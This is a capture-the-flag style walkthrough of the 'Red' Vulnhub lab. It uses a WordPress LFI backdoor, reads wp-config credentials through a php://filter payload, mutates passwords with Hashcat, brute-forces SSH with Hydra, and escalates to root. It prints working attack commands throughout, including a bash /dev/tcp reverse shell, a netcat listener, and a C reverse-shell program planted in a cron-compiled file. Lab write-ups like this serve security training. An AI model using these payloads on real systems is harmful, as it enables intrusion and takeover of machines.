RED: Vulnhub Machine Walkthrough
As Blue team cybersecurity analysts, we discovered a Local File Inclusion (LFI) backdoor on a website utilizing the WordPress framework. Through utilizing Hashcat rules and password mutation techniques, we were able to uncover login credentials and regain access to the compromised machine, known as the “Red” Vulnhub machine. However, it is important to note that the malicious actor (referred to as “Red”) will likely take additional defensive measures to maintain their access and prevent our efforts to regain control.
So Firstly we would need to boot up our machine in our Virtualbox instance(ensure That your Virtualbox network setting has been set to bridged adapter to enable you Attack from your main Host OS).
with our machine started we would need to discover the Targets Ip Address by running the codes below in our terminal
netdiscover -i <Network interface Name>
Note that your IP address range might be different
now that we have discovered our Targets Ip address we move to the first process of every Attack,
First thing we need to do is Scanning,To find the services running on our target system we will use Nmap tool here using command-
nmap -sV -sC -Pn <targets IP>
We get our results as :
with the Nmap Scan successful We Can see That We Have 2 ports open:
1.port 22 running openssh 8.1
2.port 80 running Apache httpd 2.4.41
the apache port 80 means we have a webpage so lets head over to our browser and input our target ip address to access the webpage.
Upon inspecting the website, it was determined that it was a WordPress site, however it was not loading properly. To resolve this issue, we added the website’s address to our host file by utilizing the following code.
nano /etc/hosts
now we can see a warning message from Red presented to us Stating that our site Has been HACKED.Red also gives us a clue about a backdoor.
so lets run some directory brutefore using Gobuster
gobuster dir -u <target IP> -W CommonBackdoors-PHP.fuzz.txt -s 200,204,301,302,307,401,403,500
to get the CommonBackdoors-PHP.fuzz.txt wget this file to your system using this command
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt
Here I am using Gobuster and we get the following results :
Here we can see that we have our directory: /NetworkFileManagerPHP.php
Now navigate around the website and development directory on the website.
We find something like this ->
If we google that backdoor:
It is a webshell backdoor. But based on our hint we know that Red is using it as some type of LFI backdoor.Let’s use WFUZZ to test our theory:
use wget to get this wordlist :
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/burp-parameter-names.txt
wfuzz -c -u 'http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test' -w <path to the wordlist>burp-parameter-names.txt
on our success Let’s test our theory of Local File Inclusion by obtaining a result for the parameter key.
When assessing the security of a WordPress website, the process includes reviewing the source code for vulnerabilities, particularly the wp-config.php file which holds the database credentials. To accomplish this task, we can utilize PHP Wrappers and CyberChef. The PHP Wrappers allow us to access the wp-config.php file and other sensitive files on the server, while CyberChef, a web-based tool, helps us to perform operations such as decoding and encoding, compression and decompression and more.
so we search online for payloadallthethings github
search payloadallthethings
now you would want to navigate to the php filter section which is located under the File inclusion folder
we make use of this payload
php://filter/convert.base64-encode/resource=index.php
http://redrocks.win/NetworkFileManagerPHP.php?key=php://filter/convert.base64-encode/resource=wp-config.php
now we have our config file in base64 format so we would need Another useful tool which is CyberChef, which is a web-based, all-in-one tool that can be used to perform a variety of operations on the data, including decoding and encoding, compression and decompression, and more. By using these tools, we can quickly and easily review the code and determine if there are any vulnerabilities that need to be addressed.
PD9waHANCi8qKg0KICogVGhlIGJhc2UgY29uZmlndXJhdGlvbiBmb3IgV29yZFByZXNzDQogKg0KICogVGhlIHdwLWNvbmZpZy5waHAgY3JlYXRpb24gc2NyaXB0IHVzZXMgdGhpcyBmaWxlIGR1cmluZyB0aGUgaW5zdGFsbGF0aW9uLg0KICogWW91IGRvbid0IGhhdmUgdG8gdXNlIHRoZSB3ZWIgc2l0ZSwgeW91IGNhbiBjb3B5IHRoaXMgZmlsZSB0byAid3AtY29uZmlnLnBocCINCiAqIGFuZCBmaWxsIGluIHRoZSB2YWx1ZXMuDQogKg0KICogVGhpcyBmaWxlIGNvbnRhaW5zIHRoZSBmb2xsb3dpbmcgY29uZmlndXJhdGlvbnM6DQogKg0KICogKiBNeVNRTCBzZXR0aW5ncw0KICogKiBTZWNyZXQga2V5cw0KICogKiBEYXRhYmFzZSB0YWJsZSBwcmVmaXgNCiAqICogQUJTUEFUSA0KICoNCiAqIEBsaW5rIGh0dHBzOi8vd29yZHByZXNzLm9yZy9zdXBwb3J0L2FydGljbGUvZWRpdGluZy13cC1jb25maWctcGhwLw0KICoNCiAqIEBwYWNrYWdlIFdvcmRQcmVzcw0KICovDQovLyAqKiBNeVNRTCBzZXR0aW5ncyAtIFlvdSBjYW4gZ2V0IHRoaXMgaW5mbyBmcm9tIHlvdXIgd2ViIGhvc3QgKiogLy8NCi8qKiBUaGUgbmFtZSBvZiB0aGUgZGF0YWJhc2UgZm9yIFdvcmRQcmVzcyAqLw0KZGVmaW5lKCAnREJfTkFNRScsICd3b3JkcHJlc3MnICk7DQoNCi8qKiBNeVNRTCBkYXRhYmFzZSB1c2VybmFtZSAqLw0KZGVmaW5lKCAnREJfVVNFUicsICdqb2huJyApOw0KDQovKiogTXlTUUwgZGF0YWJhc2UgcGFzc3dvcmQgKi8NCmRlZmluZSggJ0RCX1BBU1NXT1JEJywgJ1Izdl9tNGx3aDNyM19rMW5HISEnICk7DQoNCi8qKiBNeVNRTCBob3N0bmFtZSAqLw0KZGVmaW5lKCAnREJfSE9TVCcsICdsb2NhbGhvc3QnICk7DQoNCi8qKiBEYXRhYmFzZSBDaGFyc2V0IHRvIHVzZSBpbiBjcmVhdGluZyBkYXRhYmFzZSB0YWJsZXMuICovDQpkZWZpbmUoICdEQl9DSEFSU0VUJywgJ3V0ZjgnICk7DQoNCi8qKiBUaGUgRGF0YWJhc2UgQ29sbGF0ZSB0eXBlLiBEb24ndCBjaGFuZ2UgdGhpcyBpZiBpbiBkb3VidC4gKi8NCmRlZmluZSggJ0RCX0NPTExBVEUnLCAnJyApOw0KDQpkZWZpbmUoJ0ZTX01FVEhPRCcsICdkaXJlY3QnKTsNCg0KZGVmaW5lKCdXUF9TSVRFVVJMJywgJ2h0dHA6Ly9yZWRyb2Nrcy53aW4nKTsNCmRlZmluZSgnV1BfSE9NRScsICdodHRwOi8vcmVkcm9ja3Mud2luJyk7DQoNCi8qKiNAKw0KICogQXV0aGVudGljYXRpb24gdW5pcXVlIGtleXMgYW5kIHNhbHRzLg0KICoNCiAqIENoYW5nZSB0aGVzZSB0byBkaWZmZXJlbnQgdW5pcXVlIHBocmFzZXMhIFlvdSBjYW4gZ2VuZXJhdGUgdGhlc2UgdXNpbmcNCiAqIHRoZSB7QGxpbmsgaHR0cHM6Ly9hcGkud29yZHByZXNzLm9yZy9zZWNyZXQta2V5LzEuMS9zYWx0LyBXb3JkUHJlc3Mub3JnIHNlY3JldC1rZXkgc2VydmljZX0uDQogKg0KICogWW91IGNhbiBjaGFuZ2UgdGhlc2UgYXQgYW55IHBvaW50IGluIHRpbWUgdG8gaW52YWxpZGF0ZSBhbGwgZXhpc3RpbmcgY29va2llcy4NCiAqIFRoaXMgd2lsbCBmb3JjZSBhbGwgdXNlcnMgdG8gaGF2ZSB0byBsb2cgaW4gYWdhaW4uDQogKg0KICogQHNpbmNlIDIuNi4wDQogKi8NCmRlZmluZSgnQVVUSF9LRVknLCAgICAgICAgICcydXVCdmM4U081ez5Vd1E8XjVWNVtVSEJ3JU59LUJ3V3F3fD48KkhmQndKKCAkJiUsKFpiZy9qd0ZrUkhmfnZ8Jyk7DQpkZWZpbmUoJ1NFQ1VSRV9BVVRIX0tFWScsICAnYWh9PElgNTJHTDZDXkB
now we use convert from base64 on our cyberchef panel and then paste our base64 code in the input to get our decoded output.
IT should look like this:
we discovered that we have a database name as ‘wordpress’ and a database username and password as ‘john’ and ‘R3v_m4lwh3r3_k1nG!!’
now with this information we got back to the homepage and access this link made by a user called ADMINISTRATOR
http://redrocks.win/2021/10/24/hello-world/
now we have a username so lets try accessing the wordpress login page and using this credentials
http://redrocks.win/wp-login.php
now lets try to attempt logging in with the username ‘administrator’ and the password we got from the wp-config file
so after trying the creds we get an error saying The password you entered for the username administrator is incorrect
now another thing to do is to take the NetworkFileManagerPHP.php and add it at the end of our php filter to see what we get
http://redrocks.win/NetworkFileManagerPHP.php?key=php://filter/convert.base64-encode/resource=NetworkFileManagerPHP.php
we can see that we also get a different code encrypted in base64
PD9waHAKICAgJGZpbGUgPSAkX0dFVFsna2V5J107CiAgIGlmKGlzc2V0KCRmaWxlKSkKICAgewogICAgICAgaW5jbHVkZSgiJGZpbGUiKTsKICAgfQogICBlbHNlCiAgIHsKICAgICAgIGluY2x1ZGUoIk5ldHdvcmtGaWxlTWFuYWdlclBIUC5waHAiKTsKICAgfQogICAvKiBWR2hoZENCd1lYTnpkMjl5WkNCaGJHOXVaU0IzYjI0bmRDQm9aV3h3SUhsdmRTRWdTR0Z6YUdOaGRDQnpZWGx6SUhKMWJHVnpJR0Z5WlNCeWRXeGxjdz09ICovCj8
now lets head over to cyberchef to bake this code and figure out what we get
as you can see after our recipe has been baked we also get a code in base64 at the bottom of our output
VGhhdCBwYXNzd29yZCBhbG9uZSB3b24ndCBoZWxwIHlvdSEgSGFzaGNhdCBzYXlzIHJ1bGVzIGFyZSBydWxlcw==
so now lets decode this using the same procedure and see what we get
wow! after decoding the base64 string we got a message from RED saying:
That password alone won't help you! Hashcat says rules are rules
so i’m guessing we would need to use Hashcat rules.we would need to create a password list list using the hashcat rule
nano pass.txt
then paste the password we got from the wp-config file ‘R3v_m4lwh3r3_k1nG!!’
then save our password
then we go to hashcat rule in our directory using the command below
ls -al /usr/share/hashcat/rules/
so we would be making use of best64.rule by using this command
hashcat --force pass.txt -r /usr/share/hashcat/rules/best64.rule --stdout > wordlist.txt
so now we can view our freshly created wordlist.txt file by using
nano wordlist.txt
now you remember we discovered 2 open service ports during our Recon stage,this is where ssh port come to play its part.
We would be making use of Tool called Hydra.Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add which is why we would be making use of it today.
hydra -l john -P wordlist.txt <target machine IP> ssh
- -l is our username(a file list with usernames can also be used but we be making use of only a single user name ‘john’)
- -P is our password list
- ssh at the end declares what types of service we are bruteforcing
and now at the end of our bruteforce attack, we get a match. now we can try to SSH into the Server
ssh john@<server IP>
And we are in. Let’s see what else Red has put in store for us.
we have just observed that red has already setup some Kind of Cronjob command to use as a distraction.
Also red has setup a defense mechanism to log us out after 5minutes and change the Password
in our test for LFI we could see that we have a user called ippsec and we can also login successfully without a password
SO to login as ippsec we use the following command
sudo -l
sudo -u ippsec /usr/bin/time /bin/bash
and now we are successfully logged in as ippsec:
now Firstly we need to act quick and disable the cronjob system to avoid been logged out
to do this we make use of this command and create a bash script file in that directory
cd /dev/shm
ls -la
nano shell.sh
bash -i >& /dev/tcp/<kali machine IP>/9001 0>&1
tac shell.sh
chmod +x shell.sh
bash shell.sh
now we need to create a netcat listener so thatwe can get a revshell to the machine
rlwrap nc -lnvp 9001
once we get a revshell to the machine we would need to use this python command
python3 -c 'import pty;pty.spawn("/bin/bash")'
This is a command used to spawn a new shell process and attach it to a pseudo-terminal (pty) on a Unix-like system. When executed, it will open a new terminal window with a shell prompt. The command is using the pty
module to spawn a new process that runs the command /bin/bash
, which is the default shell on many Linux and Unix-like operating systems. This can be used to open a new terminal window with a shell prompt and a persistent terminal session. It is important to note that this command is a potential security vulnerability because it allows an attacker to gain unauthorized access to a system.
now we background our netcat session by using
CTRL + Z
and next we input this command and press the Enter Key twice
stty raw -echo;fg
his command sets the terminal to “raw” mode and turns off “echo” mode.
so that means we would not be getting any annoying message from red anymore
export TERM=xterm
now with this process complete once we get kicked out,we would still have access to the shell
now lets navigate to the var folder
cd /var/www/wordpress
ls -la
now we can see a .git folder which is owned by root and ippsec. we need to move into this folder
we can see a file called supersecretfileuc.c, now lets view the content of this file by using tac:
tac supersecretfileuc.c
now we can see that the C script is a cronjob and if we try executing the rev script we can see that it loads the cronjob message.
we need to remove this file but also kindly take not of the name attached to the file
now we create a new file on our system with the same name ‘supersecretfile.c’
we must also remove the rev file
rm -r rev
now we put this revshell script into our new file
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main(void){
int port=9001;
struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("<kali machine IP");
connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"/bin/bash", NULL};
execve("/bin/bash", argv, NULL);
return 0;
}
now we start a python server to get this file on our target machine
python3 -m http.server 8081
now on our ippsec@red shell,we would need to use wget to download the file from our python server hosted on our main kali machine
wget http://<machine local ip>:8081/supersecretfile.c
now if we list our directory we can see that we have our file back into the system
ls -la
now we start our rlwrap netcat listener
rlwrap nc -lnvp 9001
once this is done we wait for about 2 minutes and we get a shell as root
on our shell we use the following commands and then we discovered the use flag red was talking about.
whoami
ls
tac root.txt
if you got to this point,then Congratulations you have just PWNED RED.
I hope you enjoyed the machine and the write-up! 😁